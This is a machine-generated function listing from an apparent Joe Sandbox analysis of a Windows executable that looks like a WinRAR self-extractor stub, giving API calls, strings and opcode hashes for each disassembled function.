                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 322700389-393685449
                                        • Opcode ID: 8be25c6cadfa9f23e871e7d840317df6bc6366f2e0b23a0ff0f192add5c0013a
                                        • Instruction ID: fba5990f4e01620d8f569783d05cdc92af6a11b7fda1ab3574c18087e32cd27d
                                        • Opcode Fuzzy Hash: 8be25c6cadfa9f23e871e7d840317df6bc6366f2e0b23a0ff0f192add5c0013a
                                        • Instruction Fuzzy Hash: E8B1477182020EEFCF25DFA4C8819BEFBB5BF15390B14416AEA056B212D731DA65CF91
                                        Function 002DAF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n.
                                        • API String ID: 3519838083-795039805
                                        • Opcode ID: b98f8d1cf4cf63794f7130278d7531fee7e42a0a87b1a5427683d97031f8a57c
                                        • Instruction ID: dad2a1082ae91e9dee71b3c96701193e6077f5670aeae2a0c1fd74204b61383f
                                        • Opcode Fuzzy Hash: b98f8d1cf4cf63794f7130278d7531fee7e42a0a87b1a5427683d97031f8a57c
                                        • Instruction Fuzzy Hash: C6716971A11219EFDB15DFA4C8A5DAFB7BDFF48710B14055AE412A73A0CB30AE01CB60
                                        Function 002D6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D6FAA
                                        • _wcslen.LIBCMT ref: 002D7013
                                        • _wcslen.LIBCMT ref: 002D7084
                                          • Part of subcall function 002D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 002D7AAB
                                          • Part of subcall function 002D7A9C: GetLastError.KERNEL32 ref: 002D7AF1
                                          • Part of subcall function 002D7A9C: CloseHandle.KERNEL32(?), ref: 002D7B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3122303884-3508440684
                                        • Opcode ID: 4d7c9b7481b7eee74781199267ed6f490e4a5c0a555ee3992a9f35b2bcf4120b
                                        • Instruction ID: d2fffd3808ab7a95fa14618b2ea53b3bdfc14860f5e49aff5c062e434bedcd00
                                        • Opcode Fuzzy Hash: 4d7c9b7481b7eee74781199267ed6f490e4a5c0a555ee3992a9f35b2bcf4120b
                                        • Instruction Fuzzy Hash: 2B41FAB1D2834579EB21EB709C46FEEB76C9F04344F004557FA45A62C2E6789E688B21
                                        Function 002EB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • EndDialog.USER32(?,00000001), ref: 002EB610
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 002EB637
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 002EB650
                                        • SetWindowTextW.USER32(?,?), ref: 002EB661
                                        • GetDlgItem.USER32(?,00000065), ref: 002EB66A
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 002EB67E
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002EB694
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                        • String ID: LICENSEDLG
                                        • API String ID: 3214253823-2177901306
                                        • Opcode ID: 298b65d883f99512bcee2e982d146fbef64914ca8acab0d99dad9cc44ceeb062
                                        • Instruction ID: 14e5a6f26599e6f45621fe6677d97cc80e755be6098f952ddcc6c164ea817114
                                        • Opcode Fuzzy Hash: 298b65d883f99512bcee2e982d146fbef64914ca8acab0d99dad9cc44ceeb062
                                        • Instruction Fuzzy Hash: 6D21F9326A4255BBD2239F77ED89F7B3B7CEB4A741F414018F601961A0CB6299219631
                                        Function 002EFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,761DE604,00000001,00000000,00000000,?,?,002DAF6C,ROOT\CIMV2), ref: 002EFD99
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,002DAF6C,ROOT\CIMV2), ref: 002EFE14
                                        • SysAllocString.OLEAUT32(00000000), ref: 002EFE1F
                                        • _com_issue_error.COMSUPP ref: 002EFE48
                                        • _com_issue_error.COMSUPP ref: 002EFE52
                                        • GetLastError.KERNEL32(80070057,761DE604,00000001,00000000,00000000,?,?,002DAF6C,ROOT\CIMV2), ref: 002EFE57
                                        • _com_issue_error.COMSUPP ref: 002EFE6A
                                        • GetLastError.KERNEL32(00000000,?,?,002DAF6C,ROOT\CIMV2), ref: 002EFE80
                                        • _com_issue_error.COMSUPP ref: 002EFE93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                        • String ID:
                                        • API String ID: 1353541977-0
                                        • Opcode ID: 563b31950f8cc5243044f693e3e17a35c7faedca9abfd79d101efd0da84addfa
                                        • Instruction ID: 7b8f4a4b7dbef7f60b1a6ece9931942d1e0088bc3556c329a61a7aaa7c02f853
                                        • Opcode Fuzzy Hash: 563b31950f8cc5243044f693e3e17a35c7faedca9abfd79d101efd0da84addfa
                                        • Instruction Fuzzy Hash: E7414C71A50249ABC710DF6ACD45BAFBBACEF48710F64423AF905D7291D730A910CBE0
                                        Function 002D9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D9387
                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002D93AA
                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002D93C9
                                          • Part of subcall function 002DC29A: _wcslen.LIBCMT ref: 002DC2A2
                                          • Part of subcall function 002E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,002DC116,00000000,.exe,?,?,00000800,?,?,?,002E8E3C), ref: 002E1FD1
                                        • _swprintf.LIBCMT ref: 002D9465
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • MoveFileW.KERNEL32(?,?), ref: 002D94D4
                                        • MoveFileW.KERNEL32(?,?), ref: 002D9514
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                        • String ID: rtmp%d
                                        • API String ID: 3726343395-3303766350
                                        • Opcode ID: 5e397217778ce28c0f628b144baeaf0335d2097ddba4e550028750c2d94c930e
                                        • Instruction ID: c59969ca85b8737137e6d5fe7b6c13f5de985593e6d6a3e3f9d543fdeac6e831
                                        • Opcode Fuzzy Hash: 5e397217778ce28c0f628b144baeaf0335d2097ddba4e550028750c2d94c930e
                                        • Instruction Fuzzy Hash: 294172B192125966CF21AFA0DC55EDE737CAF41340F5048A7B649E3252DA388FE9CF60
                                        Function 002D1100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: U.$p.$z.
                                        • API String ID: 176396367-415434762
                                        • Opcode ID: 91584639732bf7a8b95d0833b4f56d9a53d11541513c9274abdf875a85b57b4c
                                        • Instruction ID: bea6c06a7a6e0880f0bb6ae7d1c80f831f6f224115759a3d5b098a49ec63c27d
                                        • Opcode Fuzzy Hash: 91584639732bf7a8b95d0833b4f56d9a53d11541513c9274abdf875a85b57b4c
                                        • Instruction Fuzzy Hash: F041D97191056A5BCB259F688C4A9EEBBBCEF10310F00402AFD45F7241DB70AE658AA0
                                        Function 002E9ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(?,00000000), ref: 002E9EEE
                                        • GetWindowRect.USER32(?,00000000), ref: 002E9F44
                                        • ShowWindow.USER32(?,00000005,00000000), ref: 002E9FDB
                                        • SetWindowTextW.USER32(?,00000000), ref: 002E9FE3
                                        • ShowWindow.USER32(00000000,00000005), ref: 002E9FF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Window$Show$RectText
                                        • String ID: .$RarHtmlClassName
                                        • API String ID: 3937224194-3232936001
                                        • Opcode ID: 331cbf4dcbe818b53de550c46ad60fd81b19e96a554c618c96358b6bce6479fe
                                        • Instruction ID: b5e467dd4c10545c2122760684750c1cb0c1408037cfcf17a0966156be09cb26
                                        • Opcode Fuzzy Hash: 331cbf4dcbe818b53de550c46ad60fd81b19e96a554c618c96358b6bce6479fe
                                        • Instruction Fuzzy Hash: CC412431454300EFCB22AF66DC89B6BBBACFF48301F008519F94999152CB74E964CF61
                                        Function 002E1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __aulldiv.LIBCMT ref: 002E122E
                                          • Part of subcall function 002DB146: GetVersionExW.KERNEL32(?), ref: 002DB16B
                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 002E1251
                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 002E1263
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002E1274
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E1284
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E1294
                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002E12CF
                                        • __aullrem.LIBCMT ref: 002E1379
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        • Opcode ID: 1c43152ad2b4c911a4136ccf19168dbd4a9ef2fa6a5fa52aa1c573f5aca05be4
                                        • Instruction ID: 697c8c14f20157cca63ef0043a2475e0fde8da5dcd64c46b3926ef6be1ab71ed
                                        • Opcode Fuzzy Hash: 1c43152ad2b4c911a4136ccf19168dbd4a9ef2fa6a5fa52aa1c573f5aca05be4
                                        • Instruction Fuzzy Hash: 6C4149B15483459FC714DF66C8809ABBBF9FF88314F40892EF596C2210E734E519CB52
                                        Function 002D2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 002D2536
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                          • Part of subcall function 002E05DA: _wcslen.LIBCMT ref: 002E05E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                        • String ID: ;%u$x%u$xc%u
                                        • API String ID: 3053425827-2277559157
                                        • Opcode ID: ee883035b10ada9993f61a7ff22407b00fef803b73ff15a048872410a27bcfd7
                                        • Instruction ID: 579d1628001ccf084683c2edd6a899ee966fa3aa7419b35e19a05501f4fba3ad
                                        • Opcode Fuzzy Hash: ee883035b10ada9993f61a7ff22407b00fef803b73ff15a048872410a27bcfd7
                                        • Instruction Fuzzy Hash: F2F11970628381DBCB15DF248495BFE779A5FA0300F08056BEE859B383CB649D69CB62
                                        Function 002E9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: </p>$</style>$<br>$<style>$>
                                        • API String ID: 176396367-3568243669
                                        • Opcode ID: 675a80ee8e626e06d9fd99e9d2179a6e0a8df47ca1f88e17ec10901628c07fb7
                                        • Instruction ID: da93add3d1927d8f2e60361fb284830c7f8028389db4bd1cacab41ecac9ff4ff
                                        • Opcode Fuzzy Hash: 675a80ee8e626e06d9fd99e9d2179a6e0a8df47ca1f88e17ec10901628c07fb7
                                        • Instruction Fuzzy Hash: C55109666E13A395DB30AE179C217B673D0DF61750FD8052BEA818B1C0FBA58DE18251
                                        Function 002FF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,002FFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 002FF6CF
                                        • __fassign.LIBCMT ref: 002FF74A
                                        • __fassign.LIBCMT ref: 002FF765
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 002FF78B
                                        • WriteFile.KERNEL32(?,00000000,00000000,002FFE02,00000000,?,?,?,?,?,?,?,?,?,002FFE02,00000000), ref: 002FF7AA
                                        • WriteFile.KERNEL32(?,00000000,00000001,002FFE02,00000000,?,?,?,?,?,?,?,?,?,002FFE02,00000000), ref: 002FF7E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 9063973c8d778a2226d01ee1ffa22e60ad6758cc7ab2204449b1aee71a0987cd
                                        • Instruction ID: 0bb9deaf4944f275e0483db16b71e8318a3caea0f3169215ed68dbf4ca80c21f
                                        • Opcode Fuzzy Hash: 9063973c8d778a2226d01ee1ffa22e60ad6758cc7ab2204449b1aee71a0987cd
                                        • Instruction Fuzzy Hash: 3C51B4B1D102099FCB10CFA8DD85AEEFBF8EF09340F14417AE655E7251E670AA50CBA0
                                        Function 002ECE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000800,?), ref: 002ECE9D
                                          • Part of subcall function 002DB690: _wcslen.LIBCMT ref: 002DB696
                                        • _swprintf.LIBCMT ref: 002ECED1
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • SetDlgItemTextW.USER32(?,00000066,0031946A), ref: 002ECEF1
                                        • _wcschr.LIBVCRUNTIME ref: 002ECF22
                                        • EndDialog.USER32(?,00000001), ref: 002ECFFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                        • String ID: %s%s%u
                                        • API String ID: 689974011-1360425832
                                        • Opcode ID: db49663659edb7216363e7a548df9965cd5bcc7c0b6487bb2dbe8e44b5d02785
                                        • Instruction ID: e154efca3010f7f2afc58241cc881218f29b656ecc80d41aa18e1b4e72309879
                                        • Opcode Fuzzy Hash: db49663659edb7216363e7a548df9965cd5bcc7c0b6487bb2dbe8e44b5d02785
                                        • Instruction Fuzzy Hash: 62419271960299AADF25DF92CC55FEE73BCEB05300F8080A7F909E7141EE709A958F61
                                        Function 002F2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 002F2937
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002F293F
                                        • _ValidateLocalCookies.LIBCMT ref: 002F29C8
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 002F29F3
                                        • _ValidateLocalCookies.LIBCMT ref: 002F2A48
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 52441b59a168a2ccffafe0e46237a6ad9f4460b1162c7e2694898e5e728d55bd
                                        • Instruction ID: bd6b64e855de1264f802cf8c0fdba26459544d92a3b353be3a106720747a56fc
                                        • Opcode Fuzzy Hash: 52441b59a168a2ccffafe0e46237a6ad9f4460b1162c7e2694898e5e728d55bd
                                        • Instruction Fuzzy Hash: 0B41E630A1020DDFCF11DF68C894AAEFBB4EF45354F148065E9156B392D7719A25CF90
                                        Function 002E9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                        • API String ID: 176396367-3743748572
